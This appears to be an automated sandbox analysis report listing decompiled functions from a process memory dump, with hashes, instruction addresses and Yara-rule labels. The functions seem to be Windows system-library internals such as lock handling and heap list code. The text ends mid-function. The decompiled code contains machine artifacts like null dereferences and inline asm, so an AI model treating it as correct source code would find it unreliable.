0x03042bb7
0x03042b5d
0x03042c2f
0x03085d5b
0x03085d77
0x03085d87
0x03085d93
0x03042c35
0x03042c35
0x03042c35
0x03042c2f
0x03042b65
0x03042b9f
0x03042ba2
0x03042b67
0x03042b67
0x03042b69
0x03042b6b
0x03042b6e
0x03042bc9
0x03042bcc
0x03042bcf
0x03042bd4
0x03042bd6
0x03042bd6
0x03042bdb
0x03042c02
0x03042c05
0x03042c07
0x00000000
0x03042c07
0x03042be0
0x03042c00
0x03042c3f
0x03042c3f
0x00000000
0x03042c00
0x03042be5
0x03042be7
0x03042bec
0x03042bf4
0x03042bf6
0x00000000
0x03042bf6
0x03042b70
0x03042b76
0x03042b2b
0x03042b2b
0x03042b2d
0x03042b2f
0x03042b32
0x03042b35
0x03042b3a
0x00000000
0x03042b40
0x03042b43
0x03042b45
0x03042b47
0x03042b4a
0x03042b4d
0x03042b53
0x00000000
0x00000000
0x00000000
0x03042b53
0x03042b78
0x03042b78
0x03042b7b
0x03042b7e
0x00000000
0x03042b7e
0x03042b76
0x03042ba5
0x03042ba5
0x03042ba8
0x03042bad
0x00000000
0x00000000
0x03042baf
0x03042baf
0x03042bc2
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4242db8c138dcfac7410dffa29d2c63598876da457c31f09dcd8782b6f54f3de
Instruction ID: 65a8cc7c5de4afd2bb456a347568559e84d54731633365efd5040139d47fb31f
Opcode Fuzzy Hash: 4242db8c138dcfac7410dffa29d2c63598876da457c31f09dcd8782b6f54f3de
Instruction Fuzzy Hash: 7E5190B6B01115CFCB18DF1CC8909BDB7B9FB88704715896AF856AB314D734AA91CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 030DAE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E030DAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E030DC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E030DACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E030DFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E030DEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03037D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E030D1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E030E1536(0x3108ae4, (_t74 -  *0x3108b04 >> 0x14) + (_t74 -  *0x3108b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L030DC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E030DA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E030BCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E030DACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x030dae44
0x030dae4c
0x030dae53
0x030dae55
0x030dae5c
0x030dae64
0x030dae68
0x030dae75
0x030dae75
0x030dae78
0x030dae7a
0x030dae7c
0x030dae7f
0x030daea8
0x030daeab
0x030daead
0x00000000
0x00000000
0x030daeb3
0x030daeb8
0x030daebb
0x030daebd
0x00000000
0x030dae81
0x030dae88
0x030dae8f
0x030dae9b
0x030dae96
0x030dae96
0x030dae96
0x030daea0
0x030daea3
0x030daebf
0x030daebf
0x030daec3
0x030daec9
0x030daf0d
0x030daf14
0x030daf3d
0x030daf3d
0x030daf41
0x030daf44
0x030daf67
0x030daf67
0x030daf6a
0x030dafca
0x030dafd1
0x00000000
0x030dafd1
0x030daf6c
0x030daf6d
0x030daf75
0x030daf7c
0x030daf7e
0x030daf80
0x030daf85
0x030daf87
0x030daf99
0x030daf89
0x030daf92
0x030daf92
0x030daf9e
0x030dafa1
0x030dafa3
0x030dafa9
0x030dafb0
0x030dafb2
0x030dafb4
0x030dafbc
0x030dafbc
0x030dafb4
0x030dafb0
0x00000000
0x030dafa1
0x030daf4f
0x030daf57
0x030daf5c
0x030daf5e
0x00000000
0x00000000
0x030daf60
0x030daf64
0x030daf64
0x00000000
0x030daf64
0x030daf1a
0x030daf25
0x00000000
0x00000000
0x030daf27
0x030daf28
0x030daf33
0x00000000
0x030daed0
0x030daed0
0x030daed2
0x030daee1
0x030daee4
0x00000000
0x00000000
0x030daee6
0x030daeec
0x00000000
0x00000000
0x030daefb
0x030daf07
0x030dafd3
0x030dafdb
0x030dafdb
0x00000000
0x030daf07
0x030daed6
0x030daed8
0x030daedf
0x00000000
0x00000000
0x00000000
0x030daedf
0x030daec9

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb9dd7851c8fda8bad048a88efb1934b9e7bf7efb6d7214f4e12b086edc6b92
Instruction ID: 342ff3c999d0c82e231abc6ec6c986e5ef4af7fe9341616c1e7f5d26dbe0c9d1
Opcode Fuzzy Hash: fdb9dd7851c8fda8bad048a88efb1934b9e7bf7efb6d7214f4e12b086edc6b92
Instruction Fuzzy Hash: 2B41E4B17063119BDB2ADB69C894BBFF3DAEF84620F084659F8168F290DB34D801C691

Uniqueness

Uniqueness Score: -1.00%

Function 0303DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0303DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0301CC50(E03014510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03037D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E030E8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03032280(_t58, _v44);
						E0303DD82(_v44, _t102, _t98);
						E0303B944(_t102, _v5);
						return E0302FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3108628; // 0x0
							_v28 = _t67;
							_t68 =  *0x310862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3108628; // 0x0
						_t105 = _v28;
						_t80 =  *0x310862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x30dfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0303dbe9
0x0303dbf2
0x0303dbf7
0x0303dbf9
0x0303dbfc
0x0303dc00
0x0303dc03
0x0303dc14
0x0303dd54
0x0303dd54
0x0303dd54
0x0303dc18
0x0303dc1d
0x0303dc1d
0x0303dc32
0x0303dc3b
0x0303dc3e
0x0303dc46
0x0303dd5b
0x0303dd62
0x0303dd64
0x0303dd67
0x0303dd69
0x0303dd6b
0x0303dd6e
0x0303dd70
0x0303dd73
0x0303dd73
0x00000000
0x0303dc4c
0x0303dc4e
0x03083ae3
0x03083ae8
0x03083aea
0x0303dce7
0x0303dce9
0x0303dcec
0x0303dcee
0x0303dcf0
0x0303dcf3
0x0303dcf5
0x03083af2
0x03083af5
0x03083af5
0x0303dd06
0x0303dd08
0x0303dd0b
0x0303dd12
0x03083b08
0x0303dd18
0x0303dd18
0x0303dd18
0x0303dd20
0x0303dd23
0x03083b16
0x03083b16
0x0303dd29
0x0303dd2d
0x0303dd36
0x0303dd40
0x0303dd51
0x0303dd51
0x0303dc54
0x0303dc59
0x0303dc59
0x0303dc5e
0x0303dc5e
0x0303dc63
0x0303dc66
0x0303dc6b
0x0303dc78
0x0303dc7b
0x0303dc81
0x0303dc81
0x0303dc83
0x0303dc89
0x00000000
0x00000000
0x0303dd7b
0x0303dd7b
0x0303dc8f
0x0303dc8f
0x0303dc92
0x0303dc99
0x0303dc9f
0x0303dca5
0x0303dcaa
0x0303dcaa
0x0303dcb3
0x0303dcb8
0x0303dcbb
0x0303dcc1
0x0303dccf
0x0303dcd2
0x0303dcd5
0x0303dcd7
0x0303dcda
0x0303dcdc
0x0303dcdc
0x0303dce2
0x0303dce4
0x00000000
0x0303dce4

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3561731fd9d4953993873c289ce583b882751433af3df1526e670cd5db6e96cb
Instruction ID: 6e8b1dde653420ec7a731903bbb671d810445b1dc3d970f5dfe71dbb0b40c2b7
Opcode Fuzzy Hash: 3561731fd9d4953993873c289ce583b882751433af3df1526e670cd5db6e96cb
Instruction Fuzzy Hash: 0A51E575A02606CFCB14DF68C480AAEFBF9FF8A310F24859AD555AB344DB70AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0302EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0302EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03019080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03012D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0302ef4b
0x0302ef4d
0x0302ef57
0x0302f0bd
0x0302f0c2
0x0302f0d2
0x0302f0d2
0x0302f0c2
0x0302ef5d
0x0302ef5f
0x0302ef67
0x0302ef6a
0x0302ef6d
0x0302ef74
0x0302ef7f
0x0302ef82
0x0302ef82
0x0302ef86
0x0302ef88
0x0302ef8c
0x0302ef8f
0x0302ef8f
0x0302ef8f
0x00000000
0x0302ef91
0x0302ef93
0x0302efc4
0x0302efc4
0x0302efc4
0x0302efca
0x0302efd0
0x0302f0a6
0x00000000
0x00000000
0x0302f0af
0x0307bb06
0x0307bb0a
0x0302f0b5
0x0302f0b5
0x0302f0b5
0x0302f0b5
0x00000000
0x0302efd6
0x0302efd9
0x0302f0de
0x0302f0e2
0x0302efdf
0x0302efdf
0x0302efdf
0x0302efe5
0x0307bafc
0x0307bafc
0x0302efe5
0x0302efeb
0x0302efed
0x0302f00f
0x0302f011
0x0302f01a
0x0302f01d
0x0302f021
0x0302f028
0x0302f029
0x0302f029
0x0302f02c
0x00000000
0x0302f02c
0x0302eff3
0x0302eff9
0x0302f0ea
0x0302f0ed
0x0302f0ef
0x00000000
0x0302f0ef
0x0302f003
0x0307bb12
0x0302f045
0x0302f049
0x0302f051
0x0302f09e
0x0302f0a0
0x0302f0a0
0x0302f09e
0x0302f053
0x0302f064
0x0302f064
0x0302f06b
0x0307bb1a
0x0307bb1a
0x0302f071
0x0302f071
0x0302f07d
0x0302f082
0x0302f08f
0x0302f08f
0x0302f009
0x0302f00d
0x00000000
0x0302f00d
0x0302efd0
0x0302ef97
0x0302efa5
0x0302efaa
0x00000000
0x0302efac
0x0302efac
0x0302efac
0x00000000
0x0302efb2
0x0302f036
0x0302f03a
0x0302f040
0x0302f090
0x00000000
0x0302f092
0x0302f042
0x00000000
0x0302f042
0x0302efb7
0x0302efb9
0x0302efbc
0x0302efb0
0x0302efb0
0x00000000
0x0302efbe
0x0302efbe
0x0302efc1
0x00000000
0x0302efc1
0x0302efbc
0x0302efaa
0x0302ef91

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: accf5227177540c98ba3a0a1c75d15e7e0c52ba0252acdc2af2607bad8eabe1c
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 5E51F330E0626AEFDBA4CB68C1D47AEFFF1AF05354F1C81A8D84597281C375A989C751

Uniqueness

Uniqueness Score: -1.00%

Function 030E740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E030E740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0306D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0305F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03034620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03034620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0305F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03034620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x030e740d
0x030e740d
0x030e7412
0x030e7413
0x030e7416
0x030e7418
0x030e741c
0x030e741f
0x030e7422
0x030e7422
0x030e7428
0x030e742a
0x030e742a
0x030e7451
0x030e7432
0x030e744f
0x030e744f
0x00000000
0x030e7434
0x030e7438
0x030e7443
0x030e7517
0x030e7517
0x030e751a
0x030e7535
0x030e7520
0x030e7527
0x030e752c
0x030e7531
0x030e7533
0x00000000
0x030e7533
0x00000000
0x030e7531
0x030e754b
0x030e754f
0x030e755c
0x030e755c
0x030e755f
0x030e7560
0x030e7561
0x030e7562
0x030e7563
0x030e7568
0x030e756a
0x030e756c
0x030e756d
0x030e756d
0x030e756f
0x030e7572
0x030e7574
0x030e7577
0x030e757c
0x030e757f
0x00000000
0x030e7551
0x030e7551
0x030e7551
0x030e7553
0x030e7553
0x030e7449
0x030e7449
0x030e744c
0x030e744c
0x00000000
0x030e744c
0x030e7443
0x030e750e
0x030e7514
0x030e7514
0x030e7455
0x030e7469
0x030e746d
0x00000000
0x030e7473
0x030e7473
0x030e7476
0x030e7480
0x030e7484
0x030e748e
0x030e7493
0x030e7493
0x030e7496
0x030e7499
0x030e74a1
0x030e74b1
0x030e74b5
0x00000000
0x030e74bb
0x030e74c1
0x030e74c1
0x030e74c4
0x030e74c5
0x030e74c6
0x030e74c7
0x030e74c8
0x030e74cd
0x00000000
0x030e74d3
0x030e74d3
0x030e74d6
0x030e74d8
0x030e74db
0x030e74dd
0x030e74e0
0x030e74e7
0x030e74ee
0x030e74ee
0x030e74f4
0x030e74f9
0x00000000
0x030e74fb
0x030e74fb
0x030e74fd
0x030e7500
0x030e7503
0x030e7505
0x030e7505
0x030e74f9
0x00000000
0x030e74cd
0x030e74b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: e147c41fa8e4d4d3023dc4ab828f159529ebfb12b6b5f79d3804492ae1808a70
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 6D516E72601606EFDB15CF54C480A96FBF9FF45704F19C5AAE9089F211E3B1E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03042990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E03042990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x30eff00);
				E0306D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2ff1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0305E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2ff1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E030951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2ff166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
